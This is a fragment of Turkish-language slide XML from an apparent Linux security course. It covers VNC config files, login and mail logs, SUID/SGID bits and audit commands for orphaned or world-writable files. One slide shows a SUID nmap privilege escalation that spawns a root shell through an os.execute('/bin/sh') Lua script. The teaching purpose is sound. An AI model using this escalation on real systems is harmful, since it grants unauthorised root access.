        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="525" name="Google Shape;525;p67"/>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ls  ~/.vnc</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="526" name="Google Shape;526;p67"/>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.vnc klasörü, VNC protokolü aracılığıyla uzaktan erişim sağlayan VNC sunucusunun yapılandırma dosyalarını içerir.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dosyalar, VNC sunucusunun yapılandırmasını ve kullanıcının VNC sunucusuna bağlanırken kullanacağı kimlik bilgilerini içerebilir.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0" name="Shape 530"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="531" name="Google Shape;531;p68"/>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Sisteme giren ve çıkan kullanıcıların kaydı</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="532" name="Google Shape;532;p68"/>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600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Username         Port     From             Latest</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="6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600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>alice            pts/0    192.168.1.100    Wed Mar 17 15:30:45 -0400 2023</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="6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600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>bob              pts/1    192.168.1.101    Wed Mar 17 14:21:32 -0400 2023</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="600">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="533" name="Google Shape;533;p68"/>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lastlog</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534" name="Google Shape;534;p68"/>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/var/log/lastlog dosyası, sisteme son giriş yapan kullanıcıların bilgilerini içeren bir log dosyasıdır.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Dosya, son giriş yapan kullanıcıların kimlikleri ve zaman damgaları gibi bilgileri içerir.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dosya, sistem güvenliği açısından önemlidir ve yalnızca root kullanıcısı veya özel izinlere sahip kullanıcılar tarafından görüntülenebilir.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Hackerlar, /var/log/lastlog dosyasını okuyabilmek için hedef sistemdeki root hesabına veya bu dosyaya erişim izni olan başka bir kullanıcı hesabına erişim sağlamaları gerekecektir.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38" name="Shape 538"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="539" name="Google Shape;539;p6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Log dosyaları</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="Google Shape;540;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1217400"/>
            <a:ext cx="8730900" cy="3439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Initializing cgroup subsys cpuset</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Initializing cgroup subsys cpu</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Initializing cgroup subsys cpuacct</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KERNEL supported cpus:</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Intel GenuineIntel</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AMD AuthenticAMD</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Centaur CentaurHauls</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x86/fpu: Legacy x87 FPU detected.</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14:16:13 localhost kernel: [0.000000] x86/fpu: Using 'lazy' FPU context switches.</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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Mar 19 14:16:13 localhost kernel: [0.000000] Linux version 4.4.0-210-generic (buildd@lcy01-amd64-023) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12) ) #242-Ubuntu SMP Wed Oct 6 12:06:51 UTC 2021 (Ubuntu 4.4.0-210.242-generic 4.4.287)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Mar 19 14:16:13 localhost kernel: [0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-210-generic root=UUID=8c58f26b-579b-44aa-8cd5-558247f9e58c ro quiet splash</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541" name="Google Shape;541;p69"/>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/var/log/message</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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5" name="Shape 545"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="546" name="Google Shape;546;p70"/>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E-posta kayıtları</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="547" name="Google Shape;547;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1217400"/>
            <a:ext cx="8730900" cy="3439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12:00:01 mailserver postfix/sendmail[1234]: fatal: unable to connect to mail.example.com[192.0.2.1]:25: Connection timed out</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12:00:01 mailserver postfix/master[5678]: warning: process /usr/libexec/postfix/sendmail pid 1234 exit status 1</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Mar 19 12:00:01 mailserver postfix/master[5678]: warning: /usr/libexec/postfix/sendmail: bad command startup -- throttling</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="548" name="Google Shape;548;p70"/>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cat /var/log/maillog</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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3" name="Shape 553"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="554" name="Google Shape;554;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="638075"/>
            <a:ext cx="8572500" cy="4105275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="555" name="Google Shape;555;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1826700" y="1292525"/>
            <a:ext cx="5490600" cy="4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US" sz="3400"/>
              <a:t>Kritik komutlar</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9" name="Shape 559"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560" name="Google Shape;560;p72"/>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Set User ID (SUID)</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="Google Shape;561;p72"/>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a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ sudo chmod u+s filename</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="562" name="Google Shape;562;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4413650" y="679925"/>
            <a:ext cx="4569300" cy="4092300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E3436"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr"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Bir dosyaya SUID biti verildiğinde, bu dosyanın kullanıcı kimliği geçici olarak dosya sahibinin kimliği olur. Bu, normalde bu dosyayı çalıştıran kullanıcının yetkilerini geçici olarak artırabilir. Örneğin, bir kullanıcının yalnızca kök kullanıcı tarafından erişilebilen bir dosyayı çalıştırmasına izin verilmesi gerekiyorsa, bu dosyaya SUID biti verilebilir.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Yalnızca dosyanın sahibi tarafından ayarlanabilir.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SUID biti, dosya sahibi olarak tanımlı kullanıcının izinlerini kullanır. Bu nedenle, kullanıcı SUID bitine sahip bir dosyayı çalıştırdığında, geçici olarak dosya sahibinin yetkilerine erişebilir.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SUDI bitine sahip dosyaları bulmak için: $find / -type f -perm /4000</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66" name="Shape 566"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="Google Shape;567;p7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Set Group ID (SGID)</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="568" name="Google Shape;568;p73"/>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a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo chmod g+s filename</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="569" name="Google Shape;569;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4413650" y="679925"/>
            <a:ext cx="4488600" cy="4034100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E3436"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr"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Bir dosyaya SGID biti verildiğinde, dosyanın çalıştırıldığı grup, dosyanın sahibi olan grup olur. Bu, dosyayı çalıştıran kullanıcının geçici olarak bu grup içindeki bir üye gibi davranmasına izin verir.Örneğin, belirli bir grubun üyelerinin bir dizine dosya yazmasına izin verilmesi gerekiyorsa, bu dizine SGID biti verilebilir.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Yalnızca dosyanın sahibi veya sahibi olan grubun yönetici kullanıcısı tarafından yapılabilir.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SGID biti, dosya sahibi olarak tanımlı grup kimliğini kullanır. Dosyayı çalıştıran kullanıcı, dosyanın sahibi olan grup içindeki bir üye olarak kabul edilir.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SGID bitine sahip dosyaları bulmak için: $find / -type f -perm /2000</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73" name="Shape 573"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="574" name="Google Shape;574;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718000" y="0"/>
            <a:ext cx="72828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Suid ve Sgid İstismarı</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="575" name="Google Shape;575;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="2164575"/>
            <a:ext cx="8676900" cy="2650200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E3436"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="182875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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type nmap: Bu komut, sistemdeki nmap komutunun tam yolunu ve türünü gösterir. Yani, nmap komutu yüklü ve kullanılabilirse, bu komut çıktı olarak nmap'in yoluyla ilgili bilgileri verir.</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sudo chmod u+s /usr/local/bin/nmap: Bu komut, /usr/local/bin/nmap dosyasına setuid özelliği ekler. Bu, nmap komutunu çalıştıran kullanıcı yerine, dosyanın sahibi olan root kullanıcısı tarafından çalıştırıldığında bu programın root haklarıyla çalışmasına izin verir.</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ls -l /usr/local/bin/nmap: Bu komut, /usr/local/bin/nmap dosyasının ayrıntılı izin bilgilerini gösterir. -rwsr-xr-x gibi bir çıktıda, "s" harfi setuid özelliğinin etkin olduğunu gösterir.</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nmap --script &lt;(echo 'require "os".execute "/bin/sh"'): Bu komut, nmap komutunu kullanarak bir Lua betiği çalıştırmaya çalışır. Bu Lua betiği, os.execute("/bin/sh") komutunu içerir, bu da /bin/sh kabuğunu başlatmaya çalışacaktır. Ancak, bu kodu çalıştırmadan önce, /usr/local/bin/nmap dosyasına setuid özelliğini ekleyen önceki adımları gerçekleştirmiş olmanız gerekiyor.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="576" name="Google Shape;576;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="679925"/>
            <a:ext cx="8676900" cy="1379100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E3436"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo chmod g+s filename type nmap</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>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1400">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ sudo chmod u+s /usr/local/bin/nmap</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>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1400">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ ls -l /usr/local/bin/nmap</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>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1400">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>-rwsr-xr-x 1 root root 2355411 2012-08-24 07:17 /usr/local/bin/nmap</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ nmap --script &lt;(echo 'require "os".execute "/bin/sh"')</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="577" name="Google Shape;577;p74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="296050" y="95150"/>
            <a:ext cx="323900" cy="323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1" name="Shape 581"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="582" name="Google Shape;582;p7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Sahipsiz veya herkes tarafından yazılabilir dosyalar</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="583" name="Google Shape;583;p75"/>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700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>find / -nouser -o -nogroup -print</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="584" name="Google Shape;584;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="2662400"/>
            <a:ext cx="8730900" cy="19068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Sahibi olmayan dosyaların sistemde olmaması gerekmektedir.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Bu dosyalar  Yönlendirme mesajlarının gönderilmesini engeller. sisteme istenmeyen şahıslar tarafından kurulan programlar olabilir.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Sistemde hiçbir dosya herkes tarafından yazılabilir durumda olmamalıdır.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Log dosyaları herkes tarafından erişilebilir olmamalıdır.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="585" name="Google Shape;585;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1280200"/>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700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>find / -perm 0002 -type f -print</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
